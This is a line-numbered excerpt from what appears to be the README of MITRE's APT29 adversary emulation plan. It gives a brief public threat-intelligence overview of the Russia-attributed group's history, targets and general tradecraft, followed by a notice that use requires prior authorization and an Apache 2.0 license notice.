Adversary Overview 10 | 11 | [APT29/The Dukes/Cozy Bear/YTTRIUM](https://attack.mitre.org/groups/G0016/) (hereinafter referred to as just APT29) is a threat group that has been attributed to the Russian government and has operated since at least 2008.[1](https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf) [14](https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf) This group has been attributed to major breaches targeting U.S. governments/organizations such as the Democratic National Committee, as well as various international ministries and agencies.[15](https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/) [16](https://securelist.com/the-cozyduke-apt/69731/) APT29 has also been known to “cast a wide net” in terms of targeting, seemingly making this group a universal threat. 12 | 13 | In terms of operational tradecraft, APT29 is distinguished by their commitment to stealth and sophisticated implementations of techniques via an arsenal of custom malware. APT29 typically accomplishes goals via custom compiled binaries and alternate (at least at the time) execution methods such as PowerShell and WMI. APT29 has also been known to employ various operational cadences (smash-and-grab vs. slow-and-deliberate) depending on the perceived intelligence value and/or infection method of victims. 14 | 15 | ## Liability / Responsible Usage 16 | 17 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 18 | 19 | ## Notice 20 | 21 | Copyright 2020 The MITRE Corporation 22 | 23 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 24 | 25 | Licensed under the Apache License, Version 2.0 (the "License"); 26 | you may not use this file except in compliance with the License. 27 | You may obtain a copy of the License at 28 | 29 | http://www.apache.org/licenses/LICENSE-2.0 30 | 31 | Unless required by applicable law or agreed to in writing, software 32 | distributed under the License is distributed on an "AS IS" BASIS, 33 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 34 | See the License for the specific language governing permissions and 35 | limitations under the License. 36 | 37 | This project makes use of ATT&CK® 38 | 39 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) 40 | --------------------------------------------------------------------------------